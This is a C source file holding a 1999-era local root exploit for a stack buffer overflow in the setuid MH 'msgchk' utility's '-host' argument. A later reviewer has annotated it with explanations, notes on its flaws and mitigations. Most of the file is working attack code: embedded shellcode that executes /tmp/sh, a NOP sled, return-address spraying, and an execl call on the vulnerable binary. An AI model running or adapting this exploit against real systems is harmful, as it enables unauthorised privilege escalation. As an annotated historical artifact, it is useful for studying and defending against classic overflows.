/*
 * coded on; ver. on Linux 2.0.36 / redhat 5.2 (others affected)
 * id: Fri Mar 26 05:50:47 AST 1999 FreeBSD 3.1-STABLE #1:
 * Thu Nov 12 23:45:17 AST 1998 icesk@urban-a.net:/usr/src/sys/compile/ICESK
 * msgchk overflow for Linux 2.0.36 on a RedHat 5.2 out of box install.
 * This overflow was not found by me and a non-working version was released.
 * Note this overflow was found in -host and other overflows posibly
 * remain uncomented on.
 * Temperary fix: chmod 700 `which msgchk`
 * The following code is july 1999 icesk..
 */

/*
 * NOTE(review): historical (1999/2000) proof-of-concept for a stack buffer
 * overflow in the MH `msgchk` utility, reached through its `-host` argument.
 * The vulnerable pattern is the classic one: a privileged (setuid) binary
 * copies an attacker-controlled argv string into a fixed-size stack buffer
 * with no length check. The author's interim mitigation above (chmod 700)
 * simply removes non-root access to the setuid binary; the real fix is a
 * bounds-checked copy in msgchk and not running it setuid at all.
 *
 * The listing is i386/Linux-2.0-era C and depends on GCC extensions that
 * modern compilers reject (casts used as lvalues, a value returned only via
 * %eax from inline asm). It is kept byte-for-byte as an artifact; comments
 * below explain what each step does and where the code itself is unsound.
 */

/*
 * The three header names were lost in extraction (angle-bracketed names were
 * stripped, leaving bare directives). As written these lines do not
 * preprocess; the original presumably named the standard stdio/stdlib/string
 * (or unistd) headers — TODO restore from the original listing, not by guess.
 */
#include
#include
#include

/* 0x90 is the i386 single-byte NOP used to build the sled in main(). */
#define nop 0x90

/* not my shellcode */
/*
 * Opaque machine-code bytes supplied by a third party (see the author's note
 * above). Only what is visible is documented here: the payload ends with the
 * literal path "/tmp/sh", so the injected code presumably executes whatever
 * is placed at /tmp/sh (confirm by disassembly). From a detection standpoint,
 * an unexpected executable at /tmp/sh, or msgchk spawning a process, is the
 * observable artifact of this technique.
 */
char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";

/*
 * Returns the caller's current stack pointer.
 *
 * The inline asm copies %esp into %eax and the function falls off the end
 * without a C `return`; on i386 %eax is the integer return register, so the
 * caller observes the stack pointer. Per the C standard a non-void function
 * reaching its end and having its value used is undefined behaviour — this
 * only works because of the i386 ABI and an old GCC that does not clobber
 * %eax in the epilogue. `u_long` is a BSD/sys-types alias, not standard C.
 */
u_long get_sp(void) { __asm__("movl %esp,%eax"); }

/*
 * Builds the attack argument and invokes the vulnerable binary.
 *
 * Layout of `buffer` (bsize bytes, heap-allocated):
 *   - whole buffer first filled with the guessed return address, 4 bytes
 *     at a time;
 *   - first half then overwritten with NOP bytes (the sled);
 *   - shellcode copied into the middle, straddling the half-way point;
 *   - last byte NUL-terminated so it passes through argv as a C string.
 *
 * `void main` is non-standard (should be `int main`). `argc`, `argv` and
 * `desc` are unused. No exit status is produced: execl() only returns on
 * failure, and that return value is ignored.
 */
void main(int argc, char **argv) {
  char *buffer, *ptr;
  long *address_ptr, *address;
  int i, desc, offset = 0, bsize = 1018;

  /* Unchecked allocation: a NULL return is dereferenced below. */
  buffer = malloc(bsize);

  /*
   * Guessed return address = this process's stack pointer minus `offset`
   * (hard-coded to 0 here). Casting an lvalue (`(char *)address = ...`) is
   * an obsolete GCC extension; current compilers reject it.
   */
  (char *)address = get_sp() - offset;

  /*
   * `%#x` expects an unsigned int but receives a `long *`; a format/argument
   * mismatch (UB) that happened to print correctly on 32-bit i386.
   */
  printf("return address %#x\n" ,address);

  ptr = buffer;
  address_ptr = (long *)ptr;

  /*
   * Fill the buffer with the return address in 4-byte steps. bsize (1018)
   * is not a multiple of 4: the last iteration (i == 1016) writes a 4-byte
   * `long` at offsets 1016..1019, i.e. 2 bytes past the end of the
   * malloc'd buffer — a heap overflow in the exploit's own process.
   * `(int *)*(address_ptr++) = address;` is again a cast-as-lvalue.
   */
  for(i=0;i < bsize;i += 4) (int *)*(address_ptr++) = address;

  /* NOP sled over the first half; the trailing half keeps the addresses. */
  for(i=0;i < bsize / 2; i++) buffer[i] = nop;

  /*
   * Centre the shellcode on the midpoint. strlen() is used on a byte array
   * that contains no NUL before "/tmp/sh", so it measures the full payload;
   * the loop bound re-evaluates strlen() on every iteration.
   */
  ptr = buffer + ((bsize / 2) - (strlen(shellcode) / 2));
  for(i=0;i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

  /* Terminate so the buffer is a valid argv string (overwrites the last
   * byte of the final address copy). */
  buffer[bsize - 1] = '\0';

  /*
   * Hand the oversized string to msgchk as the value of `-host`; the
   * overflow happens inside msgchk, not here. The variadic terminator is a
   * bare `0` (int) where `(char *)0` / NULL is required for portability —
   * it works only where int and pointer have the same size and passing
   * convention, as on i386.
   */
  execl("/usr/bin/mh/msgchk", "msgchk", "-host", buffer, 0);
}

/* www.hack.co.za [2000]*/